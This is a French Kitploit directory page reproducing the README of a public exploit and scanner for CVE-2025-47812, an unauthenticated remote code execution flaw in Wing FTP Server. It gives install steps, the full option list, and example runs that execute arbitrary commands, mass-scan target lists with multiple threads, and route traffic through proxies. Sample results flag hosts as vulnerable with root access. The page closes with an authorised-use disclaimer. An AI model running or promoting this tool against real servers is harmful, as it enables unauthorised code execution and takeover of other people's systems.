Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xjuarez/cve-2025-47812
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHub0xjuarez/cve-2025-47812

CVE-2025-47812

Exploit et scanner pour CVE-2025-47812 ciblant l'exécution de code à distance non authentifiée sur Wing FTP Server, prenant en charge le ciblage unique, le scan de masse, le proxy et plusieurs formats de sortie.

Voir le dépôt
14il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 Wing FTP Exploit - CVE-2025-47812

Exploit amélioré pour Wing FTP Server CVE-2025-47812 - Exécution de code à distance non authentifiée (RCE)

🔧 Installation

Clonez ce dépôt et entrez dans le répertoire :

root@kitploit:~
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt

Ou téléchargez simplement le script CVE-2025-47812.py et exécutez-le.

🚀 Utilisation

root@kitploit:~
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]

Exploit pour Wing FTP Server CVE-2025-47812 - version améliorée

opciones:
  -h, --help            affiche ce message
  -u URL, --url URL     URL cible (ex. http://192.168.1.100:5466)
  -f FILE, --file FILE  fichier avec liste d'URLs (une par ligne)
  -c COMMAND, --command COMMAND
                        commande à exécuter (par défaut: echo CVE-2025-47812)
  -U USERNAME, --username USERNAME
                        nom d'utilisateur (défaut: anonymous)
  -P PASSWORD, --password PASSWORD
                        mot de passe (défaut: vide)
  --check               mode vérification : vérifie seulement si vulnérable (utilise commande inoffensive)
  -v, --verbose         mode verbose (affiche les détails)
  --proxy PROXY         proxy (ex. http://127.0.0.1:8080)
  --timeout TIMEOUT     timeout en secondes (défaut: 10)
  -o OUTPUT, --output OUTPUT
                        fichier de sortie pour enregistrer les résultats
  --output-format {txt,json,csv}
                        format de sortie (défaut: txt)
  --threads THREADS     nombre de threads pour scanner plusieurs cibles (défaut: 5)
  --no-progress         masquer la barre de progression

🎯 Exemples de base

Tester une seule cible et exécuter une commande :

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v

Mode vérification (détecte seulement la vulnérabilité) :

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check

Scanner plusieurs cibles depuis un fichier :

root@kitploit:~
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json

Utiliser un proxy et le mode verbose :

root@kitploit:~
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v

📁 Structure du fichier de cibles

Le fichier doit contenir une URL par ligne, par exemple :

root@kitploit:~
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466

📊 Formats de sortie

TXT

root@kitploit:~
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable

JSON

root@kitploit:~
[
  {
    "target": "http://192.168.1.10:5466",
    "vulnerable": true,
    "info": "usuario: root"
  }
]

CSV

root@kitploit:~
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root

⚠️ Avertissement

Cet exploit est conçu uniquement à des fins éducatives et pour des tests de sécurité autorisés. L'utilisation non autorisée de cet outil contre des systèmes sans consentement explicite est illégale et peut entraîner de graves conséquences juridiques. Les auteurs déclinent toute responsabilité en cas de mauvaise utilisation.

🤝 Crédits

Auteur original : Sheikh Mohammad Hasan (4m3rr0r) – Découverte et exploit de base. Améliorations et refactorisation : 0xJuarez – Ajout de fonctionnalités de scan massif, couleurs, support des proxys, multiples formats de sortie, et améliorations d'ergonomie.

Si vous aimez ce travail, n'oubliez pas de lui donner une étoile ⭐ sur GitHub !

📄 Licence

Ce projet est sous licence MIT – voir le fichier LICENSE pour plus de détails.

Télécharger l’outil